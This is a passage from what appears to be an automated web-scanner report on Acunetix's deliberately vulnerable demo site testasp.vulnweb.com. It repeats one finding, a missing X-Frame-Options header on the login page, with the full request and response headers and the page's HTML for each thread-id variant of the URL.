type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
